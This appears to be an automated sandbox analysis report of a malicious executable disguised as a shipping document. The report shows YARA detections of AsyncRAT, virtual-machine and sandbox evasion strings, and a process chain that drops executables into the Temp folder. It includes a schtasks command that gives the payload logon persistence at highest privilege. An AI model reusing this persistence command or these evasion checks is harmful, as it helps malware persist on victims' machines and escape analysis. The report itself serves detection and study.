Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Consignment Document PL&BL Draft.exe PID: 6620, type: MEMORY

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
Source: Yara match	File source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
Source: Yara match	File source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
Source: Yara match	File source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Isgeprf.exe, VLC2.exe, 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, VLC2.exe, 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, Isgeprf.exe.2.dr	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe

Code function: 5_2_004E4BA0 sldt word ptr [eax]

5_2_004E4BA0

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Window / User API: threadDelayed 452	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Window / User API: threadDelayed 1246	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Window / User API: threadDelayed 546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Window / User API: threadDelayed 699	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Window / User API: foregroundWindowGot 832	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Window / User API: threadDelayed 2872
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Window / User API: threadDelayed 6971

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6784	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6624	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe TID: 6900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe TID: 6984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Icda.exe TID: 6972	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe TID: 6396	Thread sleep time: -23058430092136925s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe TID: 6400	Thread sleep count: 2872 > 30
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe TID: 6400	Thread sleep count: 6971 > 30
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe TID: 6448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6496	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\Icda.exe

Code function: 3_2_05290D66 GetSystemInfo,

3_2_05290D66

Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Isgeprf.exe.2.dr	Binary or memory string: vmware
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Fdquqwatjjr.exe, 00000005.00000003.451596278.0000000000C6F000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: Consignment Document PL&BL Draft.exe, 00000001.00000002.242325394.00000000012F3000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: Icda.exe, 00000003.00000002.486203101.00000000011FE000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllwH?
Source: Icda.exe, 00000003.00000002.486203101.00000000011FE000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWh
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: VLC2.exe, 0000000E.00000002.486402924.00000000010F0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`a
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234374124.0000000003066000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: Icda.exe, 00000003.00000002.494518000.00000000065E0000.00000002.00000001.sdmp, Isgeprf.exe, 00000004.00000002.267457724.00000000052C0000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.495442454.0000000005900000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.494496278.0000000005730000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\AppData\Local\Temp\Icda.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Process created: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Process created: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe 'C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Process created: C:\Users\user\AppData\Local\Temp\Icda.exe 'C:\Users\user\AppData\Local\Temp\Icda.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Process created: C:\Users\user\AppData\Local\Temp\Isgeprf.exe 'C:\Users\user\AppData\Local\Temp\Isgeprf.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Process created: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe 'C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe'' & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat''	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'VLC2' /tr ''C:\Users\user\AppData\Local\Temp\VLC2.exe''
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\VLC2.exe 'C:\Users\user\AppData\Local\Temp\VLC2.exe'

Source: Icda.exe, 00000003.00000002.486203101.00000000011FE000.00000004.00000020.sdmp	Binary or memory string: GrProgram Manager
Source: Icda.exe, 00000003.00000002.492076127.0000000003396000.00000004.00000001.sdmp	Binary or memory string: Program Manager#
Source: Icda.exe, 00000003.00000002.491052946.0000000003218000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: Icda.exe, 00000003.00000002.487069083.0000000001760000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Icda.exe, 00000003.00000002.487069083.0000000001760000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Icda.exe, 00000003.00000002.487069083.0000000001760000.00000002.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.488601298.00000000011B0000.00000002.00000001.sdmp, VLC2.exe, 0000000E.00000002.487373779.00000000016F0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: Icda.exe, 00000003.00000002.491052946.0000000003218000.00000004.00000001.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
